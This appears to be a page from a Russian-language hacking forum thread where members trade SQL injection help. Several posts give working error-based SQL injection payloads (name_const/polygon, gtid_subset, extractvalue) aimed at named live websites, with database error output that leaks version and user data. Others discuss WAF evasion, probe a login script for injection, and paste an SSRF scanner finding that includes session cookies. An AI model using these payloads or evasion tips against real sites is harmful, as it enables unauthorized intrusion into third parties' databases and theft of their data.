Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    Code:
    http://metroeyesng.com/?/product/online_store/&prd_id=11'AND+polygon((select*from(select name_const(version(),1))x))+--+-

    Code:
    Illegal non geometric '(select `x`.`5.5.55-38.8-log` from (select NAME_CONST(version(),1) AS `5.5.55-38.8-log`) `x`)' value found during parsing
    SELECT * FROM mc_product WHERE prd_store='online_store' AND prd_id='11'AND polygon((select*from(select name_const(version(),1))x)) -- -'
     
    panic.ker, BigBear and kacergei like this.
  2. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    А не подскажите как в таких ситуациях выводить БД/таблицы? А то пробовал и в hex загонять не выходит (толи руки не оттуда(( )
     
  3. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    joelblack, в чем смысл давать вектор с name_const? Тем более новичку.
     
  4. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Есть тут уязвимость?
    [​IMG]
     
  5. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Лол, плайнтекстом никак?
    И смысл вырезать все "опасные" символы, когда mysql_real_escape_string() наше все? Дальше этот колхоз в виде картинки разглядывать не стал.
     
  6. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    От избытка свободного времени))) Прогнал его картинку в FineReader'e, для удобства других пользователей) Надеюсь без ошибок (разрешение картинки маловато...))
    PHP:
    <?php
    Обработка формы авторизации
    *
    *    
    ©author            Cusnir Simion <cusnir.simioni©vjebmaster.md>
    *    
    ©copyright        Copyright (c2016Webmaster Studiohttps://www.webmaster.md
    *    ©version        3.0 Date2016-06-04
    *    @link            /ws/lock.php
    ?>
    <?php
    include ($_SERVER["DOCUMENT_ROOT"]."ws/include,php");
    if( ( isset(
    $_POST['login']) && $_POST['login'] ) and ( isset($_POST['pass']) && $_POST['pass'] ) )
    {
            if(isset(
    $_SESSION['captcha_keystring']) && $_SESSION['captcha_keystring'] == $_POST['keystring']){

                
    $ar_clean_post filter_input_array(INPUT_POSTFILTER_SANITIZE_STRING);
                
    $login str_replace(array(" ","'","\"","(",")"), ""$ar_clean_post['login']);

                
    $login mb_substr$login025'UTF-8');

                
    $pass hash('sha512'$ar_clean_post['pass']);
                
    $pass hash('sha512'$pass.$_security_salt); //show($pass); exit;

                
    $result mysql_query("SELECT * FROM 'ws_users' WHERE 'login'='$login' AND 'pass'='$pass' AND active = 1 AND block = 0 LIMIT 1");

                if ( 
    mysql_num_rows($result)!==)
                {
                    
    $_SESSION['auth_error'] = '<div class="alert alert-danger">'.$GLOBALS['ar_define_langterms']['MSG_ADMIN_WRONG_AUTH_DATA'].'</div>';
                }
                else
                {
                    
    $us_data mysql_fetch_array($result);
                    if( 
    $us_data['block'] )
                    {
                        
    $_SESSION['auth_error'] = '<div class="alert alert-danger">'.$GLOBALS['ar_define_langterms']['MSG_ADMIM_IS_BLOCKED'].'</div>';
                    }
                    else
                    {
                        
    // запоминаем пользователя.
                        
    $login_crypt crypt(Slogin);
                        
    $res_mem mysql_query("UPDATE ws_users SET login_crypt='$login_crypt', 'auth_date' = NOW() WHERE login='$login'");

                        
    $_SESSION['login']    = $login;
                        
    $_SESSION['mem']    = $login_crypt;
                        
    $_SESSION['image']    = $us_data['image'];
                    }
                }

               
            }else{
            
    $_SESSION['auth_error'] = '<div class="alert alert-danger">',$GLOBALS['ar_define_langterms']['MSG_ADMIN_BAD_CAPTCHA'].'</div>';
            }
    }

    unset(
    $_SESSION['captcha_keystring']);

    if( 
    $_SERVER['HTTP_REFERER'] )
        
    header("Location: ".$_SERVER['HTTP_REFERER']);
    else
        
    header("Location: /ws/");
    ?>
     
    #2406 kacergei, 28 Aug 2018
    Last edited: 28 Aug 2018
    crlf likes this.
  7. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Да нормальная там кариинка!
     
  8. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Нет. Разве что бекслешем сломать запрос.

    Держи нас в курсе.
     
  9. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Оно на современных версиях кроме version() ничего не выведет, не принимает подзапросы. Нужно искать другой вектор.
     
    kacergei and panic.ker like this.
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Server side request forgery
    Сканер показывает но когда начал разбираться понял что кажись ложное.
    Ну я рукожоп кто что скажет по этому поводу ?


    Code:
    Attack details
    
    URL encoded GET input was set to http://hitLVcyIasXkF.bxss.me/
    
    An HTTP request was initiated for the domain hitLVcyIasXkF.bxss.me which indicates that this script is vulnerable to SSRF.
    
    HTTP request details:
    IP address: 91.204.73.53
    User agent: Web Optimizer Downloader
    
    HTTP request
    
    GET /sites/all/modules/weboptimizer/web-optimizer/cache/wo.static.php?http://hitLVcyIasXkF.bxss.me/ HTTP/1.1
    Cookie: SESSb528791853c11d9e7e82fab0a8e003d2=kvpg8nj53d8rjuceaktobpo0p2; _ym_uid=1536190447487022978; _ym_d=1536190447; _ym_isad=2; _ym_visorc_22122178=w; jv_enter_ts_vIAkaUXWoO=1536190587910; jv_visits_count_vIAkaUXWoO=1; jv_refer_vIAkaUXWoO=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); jv_utm_vIAkaUXWoO=; jv_pages_count_vIAkaUXWoO=4; yp=1851550627.yrtsi.1536190627; yandexuid=3741984211536190850; yabs-sid=863698391536190850; przvdom=aec9e0b96eda1de56e7eca16487d8d2ef79cce42ed4c98f1c0c900b331344c90; przvlng=ru; przvgl=6c2147e2951f84179d9f2216c0be95adbabf6df2deaa2e03910bfa85f2369217; przvusr=e58c712e76e2839e403274f18df9c76c81e49678fb83c2f3b64b7a13cfdc21ae; przvonline=1; przvdistance=0; jv_close_time_vIAkaUXWoO=1536191313662
    Host: dominant-telecom.ru
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
     
  11. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Sensoft, а что за сканер использовался?
     
  12. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    акаунтикс
     
  13. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Помогите подобрать вектор, никак не могу понять что фильтруется(
    Почти постоянно упираюсь в ошибку: 412 Precondition Failed

    Хоть какой-то другой вывод был при таких запросах:
    Code:
    URL: demo.site.net/index.php?information_id=3&route=information/information%27and(extrac-tvalue(null,con-cat(1,(select+user()))))=%271/251
    
    Fatal error: Uncaught Exception:
    Error: Unknown column 'extrac' in 'where clause'
    Error No: 1054
    SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(extrac-tvalue(null,con-cat(1,(select user()))))='1/251' in /home/www/demo.site.net/system/database/mysqli.php:39
    Stack trace:
    #0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
    #1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
    #2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
    #3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
    #4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
    #5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
    #6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39

    Code:
    URL: demo.site.net/index.php?information_id=3&route=information/information%27and(oc_user())=%27
    Fatal error: Uncaught Exception: Error: FUNCTION vilmargp_demo.oc_user does not exist
    Error No: 1305
    SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(oc_user())='' in /home/www/demo.site.net/system/database/mysqli.php:39
    Stack trace:
    #0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
    #1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
    #2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
    #3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
    #4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
    #5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
    #6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39
    
    vilmargp_demo
     
    #2413 kacergei, 10 Sep 2018
    Last edited: 10 Sep 2018
  14. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Там waf стоит
    Ваш запрос был отфильтрован из-за возможных проблем безопасности.
    Ищи тамперы которые подойдут по другому не как
    Ну или ищи гуру по sql injection, есть тут уникумы которые и руками раскрутят, там вроде waf не очень хороший стоит
     
    #2414 Sensoft, 10 Sep 2018
    Last edited: 10 Sep 2018
  15. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    Code:
    http://demo.villagedefrance.net/index.php?information_id=3&route=information/information' AND gtid_subset(user(),0) AND '1#
    Code:
    Fatal error: Uncaught Exception: Error: Malformed GTID set specification '[email protected]'.<br />Error No: 1772<br />SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information' AND gtid_subset(user(),0) AND '1' in /home/www/demo.villagedefrance.net/system/database/mysqli.php:39 Stack trace: #0 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array) #1 /home/www/demo.villagedefrance.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...') #2 /home/www/demo.villagedefrance.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...') #3 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index() #4 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action)) #5 /home/www/demo.villagedefrance.net/index.php(237): Front->dispatch(Object(Action), Object(Action)) #6 {main} thrown in /home/www/demo.villagedefrance.net/system/database/mysqli.php on line 39
     
    Gorev and crlf like this.
  16. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    joelblack красиво потроллил :D
     
  17. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Да, в этом коде есть уязвимости. Можешь не благодарить.
     
  18. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Есть эксплоит на nginx 1.13.9 ?
     
  19. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    man474019: nothing to do this.
    The request is then force-clipped to 14 characters. Look for SQL in other places, and there will be happiness.
     
    eminlayer7788 likes this.
  20. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    At this place - no way. (this no Mysql limit) Look for another vulnerable place.
     
    eminlayer7788 likes this.